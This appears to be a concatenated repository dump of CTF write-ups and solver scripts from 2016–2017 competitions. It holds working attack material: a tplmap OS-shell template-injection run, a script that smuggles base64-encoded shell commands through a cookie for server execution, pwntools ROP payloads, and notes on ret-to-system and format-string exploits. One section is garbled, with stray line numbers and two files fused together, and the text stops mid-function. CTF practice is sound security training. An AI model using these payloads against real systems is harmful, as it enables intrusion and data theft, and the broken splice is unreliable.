The flag is : IceCTF{tH3_c4t_15_Ou7_oF_THe_b49}
-------------------------------------------------------------------------------- /2016/IceCTF2016/web/spotlight/readme.md: --------------------------------------------------------------------------------
* Spotlight (Web · 10 pt)

We got access to : http://spotlight.vuln.icec.tf/ A black page, but when you move the mouse a halo of light appears.

Analyzing with Firebug

```
spotlight.js => console.log("DEBUG: IceCTF{5tup1d_d3v5_w1th_th31r_l095}");
```

The flag is : IceCTF{5tup1d_d3v5_w1th_th31r_l095}
-------------------------------------------------------------------------------- /2016/csaw2016/forensic/clams_dont_dance/image0.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/forensic/clams_dont_dance/image0.gif
-------------------------------------------------------------------------------- /2016/csaw2016/forensic/clams_dont_dance/readme.md: --------------------------------------------------------------------------------
**Clams don't dance**

The file provided for the challenge was: out.img
```BASH
foremost out.img
```

Foremost carves out three directories for us:
```BASH
mov pptx zip
```
In the zip directory we have a zip file:

```BASH

unzip 00010174.zip

[Content_Types].xml docProps ppt _rels
```
The zip contains the whole structure of a PowerPoint file.

Looking more closely at the ppt/media directory, one image is present in the directory but absent from the presentation

![Alt](image0.gif "image0.gif")

To recover the information contained in the QR code, we upload the image to this site:

[link](https://zxing.org/w/decode "Zxing.org decode")

In the raw text we see the flag appear:
```BASH
flag{TH1NK ABOUT 1T B1LL. 1F U D13D, WOULD ANY1 CARE??}
```
by ark1nar
-------------------------------------------------------------------------------- /2016/csaw2016/forensic/kill/readme.md: --------------------------------------------------------------------------------
#Kill

We have a kill.pcapng


```
ghozt@maze:~/csaw/kill$ strings kill.pcapng | grep flag
=flag{roses_r_blue_violets_r_r3d_mayb3_harambae_is_not_kill}
```

That's an epic forensic chall!
-------------------------------------------------------------------------------- /2016/csaw2016/misc/coinslot/coinslot.py: --------------------------------------------------------------------------------
#!/usr/bin/env python3

import socket
import re

# coin values in cents, largest first: $10000 ... 1 cent (see readme)
DENOMINATIONS = [1000000, 500000, 100000, 50000, 10000, 5000, 2000,
                 1000, 500, 100, 50, 25, 10, 5, 1]


def answer(s, data="0\n"):
    s.send(data.encode())
    s.recv(1000)


TCP_IP = 'misc.chal.csaw.io'
TCP_PORT = 8000
BUFFER_SIZE = 1024

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
for j in range(0, 2016):
    text = s.recv(BUFFER_SIZE).decode()
    print(str(j) + ":" + text)
    match = re.search(r'(\d+)\.(\d\d)', text)
    print(str(j) + " " + match.group(0))
    # work in integer cents: dollars * 100 + cents, no float involved
    left = int(match.group(1)) * 100 + int(match.group(2))
    # greedy change-making, one count per denomination in the server's order
    counts = []
    for coin in DENOMINATIONS:
        counts.append(left // coin)
        left -= counts[-1] * coin
    for c in counts[:-1]:
        answer(s, str(c) + "\n")
    # the last answer is followed by the verdict, which we want to keep
    s.send((str(counts[-1]) + "\n").encode())

print(s.recv(1024).decode())

s.close()

-------------------------------------------------------------------------------- /2016/csaw2016/misc/coinslot/readme.md: --------------------------------------------------------------------------------
# Coinslot

In this challenge, the goal was to give the correct number of each kind of coin :

- 10'000
- 5'000
- 1'000
- 500
- 100
- 50
- 20
- 10
- 5
- 1
- 0.5
- 0.25
- 0.10
- 0.05
- 0.01

Since Python calculation with floats sucks so much, I multiplied by 100 and worked in cents.

You had to connect to a port and give the right number of each, 400 times in a row, and you received a "correct" message

After this, the flag was shown. Luckily I caught this message and didn't need to launch the full run again.


-------------------------------------------------------------------------------- /2016/csaw2016/misc/regexpire/readme.md: --------------------------------------------------------------------------------
# Regexpire

For this challenge, you had a limited time to send a string matching a random regexp.

The script works as a kind of regexp parser and tries to build such a string.

Unfortunately, not enough time was left and I didn't manage to correct the script.


This example of a script can help you build another parser for any string.
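As an added example (not the repository's regexpire.py), here is a generator that does what that script attempts: it parses the pattern by recursive descent, emits one string the pattern accepts, and checks the result with `re.fullmatch` before it would be sent to the server. The supported subset (literals, `.`, `\d` `\w` `\s`, `[...]` classes with ranges and negation, `(a|b)` groups, and the quantifiers `*` `+` `?` `{n}` `{n,m}`) is an assumption about what the challenge generated; anything outside it raises instead of producing a wrong answer. Choices are deterministic: first alternative, smallest repeat count, smallest class member.

```python
import re
import string


class RegexWitness:
    """Recursive-descent generator: one string accepted by the pattern."""

    WORD = string.ascii_letters + string.digits + "_"
    ESCAPES = {"d": string.digits, "w": WORD, "s": " \t"}

    def __init__(self, pattern):
        self.p = pattern
        self.i = 0

    def peek(self):
        return self.p[self.i] if self.i < len(self.p) else None

    def take(self):
        if self.i >= len(self.p):
            raise ValueError("unexpected end of pattern")
        c = self.p[self.i]
        self.i += 1
        return c

    def generate(self):
        s = self.alternation()
        if self.i != len(self.p):
            raise ValueError("unbalanced ')' at offset %d" % self.i)
        return s

    def alternation(self):                 # seq ('|' seq)*
        branches = [self.sequence()]
        while self.peek() == "|":
            self.take()
            branches.append(self.sequence())
        return branches[0]                 # any branch satisfies; take the first

    def sequence(self):                    # quantified*
        out = []
        while self.peek() not in (None, "|", ")"):
            out.append(self.quantified())
        return "".join(out)

    def quantified(self):                  # atom ('*' | '+' | '?' | '{..}')?
        atom = self.atom()
        c = self.peek()
        if c in ("*", "?"):
            self.take()
            return ""                      # zero repetitions is the cheapest match
        if c == "+":
            self.take()
            return atom
        if c == "{":
            self.take()
            spec = ""
            while self.peek() != "}":
                spec += self.take()
            self.take()
            return atom * int(spec.split(",")[0] or 0)   # lower bound of {n}, {n,m}, {,m}
        return atom

    def atom(self):
        c = self.take()
        if c == "(":
            inner = self.alternation()
            if self.take() != ")":
                raise ValueError("expected ')'")
            return inner
        if c == "[":
            return self.char_class()
        if c == "\\":
            return self.ESCAPES.get(self.peek(), self.take())[0] if self.peek() not in self.ESCAPES else self.ESCAPES[self.take()][0]
        if c == ".":
            return "a"
        if c in "^$":
            return ""                      # anchors consume nothing
        return c

    def char_class(self):                  # after '[': ('^')? members ']'
        negate = self.peek() == "^"
        if negate:
            self.take()
        members = set()
        while self.peek() != "]":
            c = self.take()
            if c == "\\":
                members.update(self.ESCAPES.get(self.peek(), self.peek()))
                self.take()
            elif self.peek() == "-" and self.p[self.i + 1:self.i + 2] not in ("", "]"):
                self.take()
                hi = self.take()
                members.update(chr(x) for x in range(ord(c), ord(hi) + 1))
            else:
                members.add(c)
        self.take()
        if negate:
            for cand in string.ascii_lowercase + string.digits + "!":
                if cand not in members:
                    return cand
            raise ValueError("negated class excludes every candidate")
        return min(members)


def witness(pattern):
    """Generate a match and verify it with Python's engine before use."""
    s = RegexWitness(pattern).generate()
    if not re.fullmatch(pattern, s):
        raise ValueError("generator produced %r, which does not match %r" % (s, pattern))
    return s


if __name__ == "__main__":
    for pat in (r"[a-z]{3}\d+(foo|bar)?", r"^(ab|cd)*x[^x]$", r"\w{2,4}-[0-9]"):
        print("%-28s -> %r" % (pat, witness(pat)))
```

Wired into the challenge loop, `witness(regex)` replaces the hand-rolled character walk of regexpire.py; the `re.fullmatch` check is what keeps a parser mistake from costing a round against the clock.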
-------------------------------------------------------------------------------- /2016/csaw2016/misc/regexpire/regexpire.py: --------------------------------------------------------------------------------
#!/usr/bin/env python

import socket
import re

def answer(s, data="0\n"):
    s.send(data)
    s.recv(1000)

TCP_IP = 'misc.chal.csaw.io'
TCP_PORT = 8001
BUFFER_SIZE = 1024

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
text = s.recv(BUFFER_SIZE)
while 1:
    text1 = s.recv(BUFFER_SIZE)
    print text1
    i = 0
    answer = ""
    last = ""
    while i < len(text1):
        c = text1[i]
        if c == "(":
            last = ""
            i += 1
            nextC = text1[i]
            add = 1
            while nextC != ")":
                if nextC == "|":
                    add = 0
                if add == 1:
                    last += nextC
                i += 1
                nextC = text1[i]
            answer += last
        elif c == "[":
            lastC = text1[i]
            i += 1
            nextC = text1[i]
            while nextC != "]":
                lastC = text1[i]
                last = lastC
                i += 1
                nextC = text1[i]
            answer += last
        elif c == "{":
            cnt = ""
            i += 1
            nextC = text1[i]
            while nextC != "}":
                nextC = text1[i]
                cnt += nextC
                i += 1
            answer += last * (int(cnt[:-1]) - 1)
        elif c == "+":
            print "nothing"
        elif c == "*":
            print "nothing"
        elif c == "\\":
            i += 1
            nextC = text1[i]
            if nextC == "d":
                last = "1"
            if nextC == "w":
                last = "a"
            answer += last
        else:
            last = c
            answer += last

        i = i + 1
    print answer
    s.send(answer + "\n")



s.close()

-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/dumpjeu.help: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/dumpjeu.help
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/hungman: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/hungman
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/hungman.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/hungman.i64
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/jeu.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/jeu.bin
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/lance: --------------------------------------------------------------------------------
#!/bin/sh
socat tcp-listen:8003,fork,reuseaddr exec:./hungman
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/libc-2.23.so
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/NC2: --------------------------------------------------------------------------------
NC2='nc pwn.chal.csaw.io 8002'
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/NC2.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/NC2.tgz
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/NC2l: --------------------------------------------------------------------------------
NC2='nc localhost 8002'
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/libc-2.19.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/libc-2.19.so
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/tutorial: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/tutorial
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/tutorial.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/tutorial.i64
-------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/tutorial2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/tutorial2
--------------------------------------------------------------------------------
/2016/csaw2016/pwn/Tutorial/what: -------------------------------------------------------------------------------- 1 | 7feb6e3c0000 -> 2 | 7feb6e42b490 (6b) 3 | 4 | 7f8e0486c000 -> 5 | 7f8e048d7490 (6b) 6 | 7 | 7f34a2134000-> 8 | 7f34a219f490 (6b) 9 | 10 | -------------------------------------------------------------------------------- /2016/csaw2016/web/mfw/index.php: -------------------------------------------------------------------------------- 1 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | My PHP Website 26 | 27 | 28 | 29 | 30 | 51 | 52 |
53 | 56 | 57 |
58 | 59 | 17 | ``` 18 | 19 | Aucun formulaire de contact donc nous passons à autre chose. 20 | 21 | Si nous appelons une page qui n'existe pas, le site nous retourne comme information qu'il est développé avec flask. 22 | 23 | On tente : 24 | 25 | ``` 26 | http://mrpresident.sthack.fr/banish?name=Ryan{{7*7}} 27 | ``` 28 | 29 | Nous obtenons comme retour : Ryan49 30 | 31 | Nous avons donc une template injection. 32 | 33 | On récupère un shell avec [TPLMAP](https://github.com/epinna/tplmap) : 34 | 35 | ```BASH 36 | ./tplmap.py --os-shell -u 'http://mrpresident.sthack.fr/banish?name=Ryan' 37 | ``` 38 | 39 | On cherche le flag : 40 | 41 | 42 | ```BASH 43 | posix-linux2 $ ls -lash /flag/is/here 44 | total 28 45 | 4 drwxr-xr-x 1 root root 4.0K Apr 5 12:35 . 46 | 4 drwxr-xr-x 1 root root 4.0K Apr 5 12:35 .. 47 | 4 -r-------- 1 root root 17 Mar 4 23:09 flag 48 | 4 -rw-r--r-- 1 root root 198 Mar 4 23:13 getflag.c 49 | 12 -rwsr-xr-x 1 root root 10.5K Apr 5 12:35 runme 50 | ``` 51 | 52 | On affiche le flag : 53 | 54 | ```BASH 55 | posix-linux2 $ cd /flag/is/here/;./runme 56 | Y0u_G0t_TrUmp3d! 
```

By team Beers4Flags

```
 ________
|        |
|  #BFF  |
|________|
 _.._,_|,_
 (   |   )
]~,"-.-~~[
.=] Beers ([
| ]) 4 ([
'=]) Flags [
|::  '   |
 ~~----~~
```
--------------------------------------------------------------------------------
/2017/thcon/crypto/OTPunched/img/card1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/OTPunched/img/card1.png
--------------------------------------------------------------------------------
/2017/thcon/crypto/OTPunched/img/card2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/OTPunched/img/card2.png
--------------------------------------------------------------------------------
/2017/thcon/crypto/OTPunched/readme.md:
--------------------------------------------------------------------------------
**Crypto - OTPunched - 50pts**

![Alt](img/card1.png "Punched Card 1")

![Alt](img/card2.png "Punched Card 2")

We were given two IBM punched cards.

To recover the data they hold, we uploaded them to this site:

http://www.masswerk.at/cardreader/

We obtain two hex strings:

Card 1 = 365C997610306888C3CB07B26C7ED39325E4AD1BDC87255B8F5E54B66E253759B306A9BAA01B7D4A

Card 2 = 5A04DC351E3D7B9CC3CE1DFF5142B08B3AFCA60B9484336B961F54A67319304E8845ABA9B60C734A

The "OTP" in the title suggests a one-time pad, which would have been used to encrypt both plaintexts.

https://github.com/SpiderLabs/cribdrag

We use the xorstrings.py script from the cribdrag tool to XOR the two strings:

```BASH
./xorstrings.py 365C997610306888C3CB07B26C7ED39325E4AD1BDC87255B8F5E54B66E253759B306A9BAA01B7D4A 5A04DC351E3D7B9CC3CE1DFF5142B08B3AFCA60B9484336B961F54A67319304E8845ABA9B60C734A

=> 6c5845430e0d131400051a4d3d3c63181f180b1048031630194100101d3c07173b43021316170e00
```

We then apply the crib-dragging technique to this string.

```BASH
./cribdrag.py 6c5845430e0d131400051a4d3d3c63181f180b1048031630194100101d3c07173b43021316170e00

Your message is currently:
0 ________________________________________
Your key is currently:
0 ________________________________________
Please enter your crib: punched cards
0: "-+ fhw4cdh)N"
1: "(0-mevp f{?YO"
2: "56`n{qd%y,OX"
3: "3{cp|ea:.\Nk"
...
26: "pes_or_cards}"
27: "`hRd^'"pwejs"
Enter the correct position, 'none' for no match, or 'end' to quit: 26

Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0 __________________________punched cards_
Your key is currently:
0 __________________________pes_or_cards}_
```

We continue this way, testing candidate words, until we obtain the flag.
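The XOR and crib-dragging steps above, as an added example that is not part of the repository: reusing one pad on two messages means `c1 XOR c2 = m1 XOR m2`, so a guessed fragment of one message reveals the aligned fragment of the other, and no key material is needed at all. The card strings are the ones from the readme; the `punched cards` crib at offset 26 reproduces the `pes_or_cards}` hit shown in the cribdrag session.

```python
"""Two-time-pad recovery: XOR the two ciphertexts, then drag a crib across the result."""
import string

# The two hex strings read from the punched cards (taken from the readme above).
CARD1 = "365C997610306888C3CB07B26C7ED39325E4AD1BDC87255B8F5E54B66E253759B306A9BAA01B7D4A"
CARD2 = "5A04DC351E3D7B9CC3CE1DFF5142B08B3AFCA60B9484336B961F54A67319304E8845ABA9B60C734A"

# Printable ASCII including space, excluding control whitespace.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def xor_bytes(a, b):
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def xor_hex(hex_a, hex_b):
    """What xorstrings.py computes: c1 XOR c2 == m1 XOR m2 when the same pad was reused."""
    return xor_bytes(bytes.fromhex(hex_a), bytes.fromhex(hex_b))


def crib_drag(xored, crib, printable_only=True):
    """Slide `crib` over m1^m2. Where the crib really is part of one message, the
    result is the aligned slice of the other message. Returns [(offset, text)]."""
    crib = crib.encode()
    hits = []
    for off in range(len(xored) - len(crib) + 1):
        candidate = xor_bytes(xored[off:off + len(crib)], crib)
        # most wrong offsets produce control characters; drop those candidates
        if printable_only and any(b not in PRINTABLE for b in candidate):
            continue
        hits.append((off, candidate.decode("ascii")))
    return hits


def recover_other(xored, known, offset):
    """Once a slice of one message is confirmed, the other message's slice falls out."""
    return xor_bytes(xored[offset:offset + len(known)], known.encode()).decode("ascii", "replace")


if __name__ == "__main__":
    x = xor_hex(CARD1, CARD2)
    print(x.hex())
    for off, text in crib_drag(x, "punched cards"):
        print(off, repr(text))
```

Every confirmed fragment extends the known part of both messages, which is exactly the loop the cribdrag session walks through by hand.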

thcon{punched_tapes_or_cards}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/thcon/crypto/brokenhash/file/a.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/a.pdf
--------------------------------------------------------------------------------
/2017/thcon/crypto/brokenhash/file/b.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/b.pdf
--------------------------------------------------------------------------------
/2017/thcon/crypto/brokenhash/file/shattered-1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/shattered-1.pdf
--------------------------------------------------------------------------------
/2017/thcon/crypto/brokenhash/file/shattered-2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/shattered-2.pdf
--------------------------------------------------------------------------------
/2017/thcon/crypto/brokenhash/img/right.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/img/right.jpg
--------------------------------------------------------------------------------
/2017/thcon/crypto/brokenhash/img/top.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/img/top.jpg
--------------------------------------------------------------------------------
/2017/thcon/crypto/brokenhash/readme.md:
--------------------------------------------------------------------------------
**Crypto - brokenhash - 100pts**

The challenge was a website that let us upload two files.

We create two empty files:

```BASH
touch t.txt
touch t2.txt
```

The site redirects us to a page containing the following information:

```BASH
if sha1[0] == sha1[1] and md5[0] != md5[1]: get flag # ;)
```

So what is wanted is a SHA-1 collision, which fits the news of the moment perfectly.

Our first attempt was to upload the two PDFs released with Google's SHA-1 collision research; they have the same SHA-1 sum.

[File 1: SHA-1 collision by Google](../100/file/shattered-1.pdf)

[File 2: SHA-1 collision by Google](../100/file/shattered-1.pdf)

Response from the challenge site => Too Easy.

We used the site https://alf.nu/SHA1 to build our own collision.

The prerequisites are two JPEGs smaller than 64 KB.

![Alt](img/right.jpg "Image 1")

![Alt](img/top.jpg "Image 2")

The site gives us back two PDFs:

[File 1: SHA-1 collision by Beers4Flags](../100/file/a.pdf)

[File 2: SHA-1 collision by Beers4Flags](../100/file/b.pdf)

We check that our two PDFs really have the same SHA-1 sum:

```BASH
sha1sum a.pdf
9895a12be3429d4ca69835aad36527664ed952e5 a.pdf

sha1sum b.pdf
9895a12be3429d4ca69835aad36527664ed952e5 b.pdf
```

We upload them to the site and flag!

THCon{ST0P_US1nG_Th0S3_l4m3_H4SH_FuNCTIONz}

By team Beers4Flags
--------------------------------------------------------------------------------
/2017/thcon/web/Multipass/img/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/web/Multipass/img/flag.png
--------------------------------------------------------------------------------
/2017/thcon/web/Multipass/img/web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/web/Multipass/img/web.png
--------------------------------------------------------------------------------
/2017/tuctf/crypto/crypto50.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
from pwn import *
p=remote('neverending.tuctf.com' ,12345)

print p.recvuntil("text:")

while(1):
    # send a known plaintext; the service returns it shifted, which reveals the shift
    p.sendline("ABCDEF")
    b= p.recvuntil("?\n:")
    print b
    b=b[b.index("encrypted is ")+len("encrypted is "):]
    print "ABCDEF","->",b
    delta=ord(b[0])-ord("A")
    b=b[b.index("What is ")+len("What is "):]
    b=b[:b.index(" decrypted?")]
    c=""
    for i in b:
        # undo the shift over the 95 printable ASCII characters (32..126)
        c=c+chr((ord(i)-delta-32+95) % 95+32)
    print "-->",c
    p.sendline(c)
    print p.recv(1000)


print p.recvuntil("text:")
p.sendline("ABCDEF")
b= p.recvuntil("?\n:")
print b
b=b[b.index("encrypted is ")+len("encrypted is "):]

print "ABCDEF","->",b
delta=ord(b[0])-ord("A")
b=b[b.index("What is ")+len("What is "):]
b=b[:b.index(" decrypted?")]
c=""
for i in b:
    c=c+chr((ord(i)-delta-32+95) % 95+32)
print "-->",c
p.sendline(c)

print p.recvall(1)
exit(0)
--------------------------------------------------------------------------------
/2017/tuctf/pwn/vuln-chat/payload-final.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# encoding: utf-8
from pwn import *
context.clear(arch='i386')

import time
import sys
binaire='vuln-chat'

if (len(sys.argv)>1):
    # any argument: remote service with the matching libc build
    TIME=0.0
    elf=ELF(binaire)
    libc=ELF('/opt/libc-database-master/db/libc6-i386_2.19-18+deb8u2_amd64.so')
    host='vulnchat.tuctf.com'
    port=4141

else:
    # no argument: local instance
    TIME=0.0
    elf=ELF(binaire)
    libc=ELF('libc.so.6')
    host='localhost'
    port=59994


p=remote(host,port)

p.recvuntil("name: ")
p.sendline("ABCDEFGHIJKLMNOPQRST%s")
p.recvuntil("%s: ")
pop1=0x080483c1 # : pop ebx ; ret
PAD="ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHI"

pile=p32(0x804b580)+p32(elf.sym['printFlag'])+p32(pop1)+p32(elf.got['fflush'])+p32(pop1)+p32(elf.sym['stdout'])
p.sendline(PAD+pile)
print p.recvall(2)
exit(0)
--------------------------------------------------------------------------------
/2017/tuctf/pwn/vuln-chat2/payload-final.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# encoding: utf-8
from pwn import *
context.clear(arch='i386')

import time
import sys
binaire='vuln-chat2.0'

if (len(sys.argv)>1):
    # any argument: remote service
    TIME=0.0
    elf=ELF(binaire)
    libc=ELF('/opt/libc-database-master/db/libc6-i386_2.19-18+deb8u2_amd64.so')
    host='vulnchat2.tuctf.com'
    port=4242

else:
    # no argument: local instance
    TIME=0.0
    elf=ELF(binaire)
    # libc=ELF('libc.so.6')
    host='localhost'
    port=59993

p=remote(host,port)

print p.recvuntil("name: ")
p.sendline("ABCDEFGHIJKLMNO")
print p.recvuntil("O: ")
pop1=0x080483c1 # : pop ebx ; ret
PAD="ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFabcd"
pile="\x72\x86"
p.sendline(PAD+pile)
time.sleep(4)
print p.recvall(10)

exit(0)
--------------------------------------------------------------------------------
/2017/tuctf/web/web200/solution:
--------------------------------------------------------------------------------
Le script a débuté sur dim. 26 nov. 2017 14:44:49 CET
]0;francois@aramis: /tmpfrancois@aramis:/tmp$ sh test.sh '
>
> ls
> '


ls



There's no way you can steal the flag from Woody Harrelson's Cookies!!
flag1337
images
index.php
index.txt
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

cookieharrelson.tuctf.com FALSE / FALSE 1514295906 tallahassee Y2F0IGluZGV4LnR4dCAjCgpscyAgICAgICAgICAKCg%3D%3D
cat index.txt #

ls

]0;francois@aramis: /tmpfrancois@aramis:/tmp$ sh test.sh '
>
> cat flag1337
> '
test.sh: 2: [: cat: unexpected operator


cat flag1337



There's no way you can steal the flag from Woody Harrelson's Cookies!!
Flag: TUCTF{D0nt_3x3cut3_Fr0m_C00k13s}
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.

cookieharrelson.tuctf.com FALSE / FALSE 1514295914 tallahassee Y2F0IGluZGV4LnR4dCAjCgpjYXQgZmxhZzEzMzcKCg%3D%3D
cat index.txt #

cat flag1337

]0;francois@aramis: /tmpfrancois@aramis:/tmp$ exit

Script terminé sur dim. 26 nov. 2017 14:45:20 CET
--------------------------------------------------------------------------------
/2017/tuctf/web/web200/test.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Default payload when no argument is given. "$1" must be quoted: unquoted, a
# multi-word argument produces the "[: cat: unexpected operator" error seen in
# the transcript.
if [ -z "$1" ] ; then
    COK=$(echo "\" ; ls" | base64)
else
    COK=$(echo "$*" | base64)
fi
echo "$COK" | base64 -d
rm -f cok
curl http://cookieharrelson.tuctf.com/ -b tallahassee=${COK} -c cok
cat cok
tail -n 1 cok | awk '{print $7}' | sed -e '1,$s/%3D/=/g' | base64 -d
--------------------------------------------------------------------------------
/2017/xiomara/pwn/README.md:
--------------------------------------------------------------------------------
* mint is a pwn based on a buffer overflow. It is triggered by creating a text and then appending a second text to it. It then becomes possible to overwrite main_proc's return address. The idea is a first ROP chain that prints the GOT value of puts, then loops back to 0x080483dd. At that point, knowing the libc address of puts, we can call system(/bin/sh).

* xor_tool seems to have two flaws in the decrypt function: a 4-byte BOF via read(0, s, 0x36u) where s is a 50-byte buffer, and a format-string flaw via a direct printf of the decrypted text.
payloadformat.py exploits this second flaw as follows:
- dump the stack
- print the GOT value of printf
- overwrite decrypt's return address with system(/bin/sh); the stack is written by looping on the decrypt function, each time changing the return address (0x8048907) to 0x8048902.


François
--------------------------------------------------------------------------------
/2017/xiomara/pwn/secure_pyshell/pwn2.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
import sys, cmd, os

del __builtins__.__dict__['__import__']
del __builtins__.__dict__['eval']

intro = """
Welcome to Secure Python Interpreter
================================================

Rules:
-Do not import anything
-No peeking at files!
-No sharing of flags :)

"""


def execute(command):
    exec(command, globals())

class Jail(cmd.Cmd):

    prompt = '>>> '
    filtered = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|')

    def do_EOF(self, line):
        sys.exit()

    def emptyline(self):
        return cmd.Cmd.emptyline(self)

    def default(self, line):
        sys.stdout.write('\x00')

    def postcmd(self, stop, line):
        if any(f in line for f in self.filtered):
            print("Do you think my code is so insecure ?")
            print("You can never get out of my jail :)")
        else:
            try:
                execute(line)
            except NameError:
                print("NameError: name '%s' is not defined" % line)
            except Exception:
                print("Error: %s" % line)
        return cmd.Cmd.postcmd(self, stop, line)

if __name__ == "__main__":
    try:
        Jail().cmdloop(intro)
    except KeyboardInterrupt:
        print("\rBye bye !")
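The flag text of the web200 files above (`D0nt_3x3cut3_Fr0m_C00k13s`) states the lesson: the server base64-decoded the `tallahassee` cookie and executed it, which is why `test.sh` could feed it `ls` and `cat flag1337`. Added example, not code from the repository: a cookie that carries an HMAC-SHA256 tag and is then mapped onto a fixed allow-list of states (the secret, cookie layout and state names are constructed), so tampered or attacker-minted values are rejected and even an authentic value is only ever data, never a command.

```python
"""Cookie values are attacker-controlled input: authenticate them, never execute them."""
import base64
import hashlib
import hmac

# Constructed server-side secret for this demo (in production: random, kept out of the code).
SECRET_KEY = b"demo-only-secret-do-not-reuse"

# The only cookie values the application is willing to act on (constructed allow-list).
ALLOWED_STATES = {"home", "images", "about"}


def b64e(raw):
    """URL-safe base64 without padding; '.' never appears, so it can separate fields."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64d(text):
    text = text.encode("ascii")
    return base64.urlsafe_b64decode(text + b"=" * (-len(text) % 4))


def issue_cookie(state, key=SECRET_KEY):
    """Encode the value and append an HMAC-SHA256 tag computed over the encoded form."""
    body = b64e(state.encode("utf-8"))
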